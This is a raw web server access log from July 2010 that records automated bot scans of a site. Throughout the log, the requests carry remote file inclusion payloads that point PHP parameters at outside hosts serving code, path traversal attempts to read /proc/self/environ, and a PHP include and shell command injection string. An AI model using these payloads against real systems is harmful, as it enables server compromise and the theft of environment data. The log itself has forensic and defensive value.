65.13.185.104 - - [27/Jul/2010:15:06:41 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
212.52.166.12 - - [27/Jul/2010:15:06:42 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:42 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:42 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:45 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:45 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:45 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:50 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:50 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:50 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:58 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:58 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:58 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:02 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:02 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:03 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:04 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:04 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:05 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:11 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:12 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:07:12 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:15:09:03 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:14:27 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:15:16:15 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:15:18:59 +0200] "GET /logs/access_log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 342 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:19:00 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:19:00 +0200] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.79"
78.41.204.220 - - [27/Jul/2010:15:22:41 +0200] "GET /logs//?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.813"
78.41.204.220 - - [27/Jul/2010:15:22:41 +0200] "GET //?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.813"
72.55.153.180 - - [27/Jul/2010:15:23:24 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:15:23:44 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:15:24:07 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:24:07 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:24:08 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
211.206.120.196 - - [27/Jul/2010:15:28:47 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:28:48 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:28:48 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:28:49 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:30:04 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:30:05 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:30:06 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:15:30:06 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
94.23.215.207 - - [27/Jul/2010:15:32:48 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:15:32:48 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
65.13.185.104 - - [27/Jul/2010:15:56:26 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:15:56:26 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:15:56:26 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
76.70.7.48 - - [27/Jul/2010:16:05:51 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
87.98.217.83 - - [27/Jul/2010:16:13:46 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:13:46 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:13:50 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:16:13:50 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
65.13.185.104 - - [27/Jul/2010:16:16:15 +0200] "GET /logs/access_log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:16:16:16 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:16:16:16 +0200] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
193.138.125.55 - - [27/Jul/2010:16:19:39 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:16:19:39 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
174.142.75.205 - - [27/Jul/2010:16:21:11 +0200] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 328 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:16:21:11 +0200] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 333 "-" "libwww-perl/5.805"
211.238.14.22 - - [27/Jul/2010:16:34:13 +0200] "GET /logs///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 200 802 "-" "Mozilla/5.0"
211.238.14.22 - - [27/Jul/2010:16:34:13 +0200] "GET ///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 200 666 "-" "Mozilla/5.0"
94.23.215.207 - - [27/Jul/2010:16:35:08 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:35:09 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:35:09 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:35:09 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
211.238.14.22 - - [27/Jul/2010:16:37:32 +0200] "GET /logs/access_log%20%20///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
41.78.28.104 - - [27/Jul/2010:16:41:44 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
81.208.34.38 - - [27/Jul/2010:16:47:21 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:16:47:21 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
81.208.34.38 - - [27/Jul/2010:16:47:21 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://akas.fileave.com/akas1.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
72.37.150.18 - - [27/Jul/2010:16:53:52 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:16:53:53 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 316 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:16:53:53 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:16:53:53 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 316 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:16:53:53 +0200] "GET /logs/access_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 329 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:16:53:53 +0200] "GET /logs/access_log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 329 "-" "MaMa CaSpEr"
41.78.28.104 - - [27/Jul/2010:16:54:59 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
94.23.215.207 - - [27/Jul/2010:16:56:25 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:56:25 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:56:29 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:56:29 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:05 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:05 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:06 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:06 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:28 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:28 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:35 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:57:35 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
41.78.28.104 - - [27/Jul/2010:16:57:46 +0200] "GET //pingserver.php HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
94.23.215.207 - - [27/Jul/2010:16:58:27 +0200] "GET /logs/access_log/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:58:27 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:58:28 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:58:30 +0200] "GET /logs/access_log/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:58:30 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:16:58:30 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
211.238.14.22 - - [27/Jul/2010:17:04:16 +0200] "GET /logs/access_log///?_PHPLIB[libdir]=http://stemandstein.com//poll/id11.txt?? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
217.16.18.219 - - [27/Jul/2010:17:11:50 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
208.69.56.95 - - [27/Jul/2010:17:13:40 +0200] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
208.69.56.95 - - [27/Jul/2010:17:13:40 +0200] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
208.69.56.95 - - [27/Jul/2010:17:13:40 +0200] "GET /logs/access_log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
217.16.18.219 - - [27/Jul/2010:17:13:40 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:17:13:41 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [27/Jul/2010:17:13:41 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
208.69.56.95 - - [27/Jul/2010:17:13:51 +0200] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
208.69.56.95 - - [27/Jul/2010:17:13:51 +0200] "GET /logs/access_log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
208.69.56.95 - - [27/Jul/2010:17:13:51 +0200] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
83.149.110.213 - - [27/Jul/2010:17:17:27 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
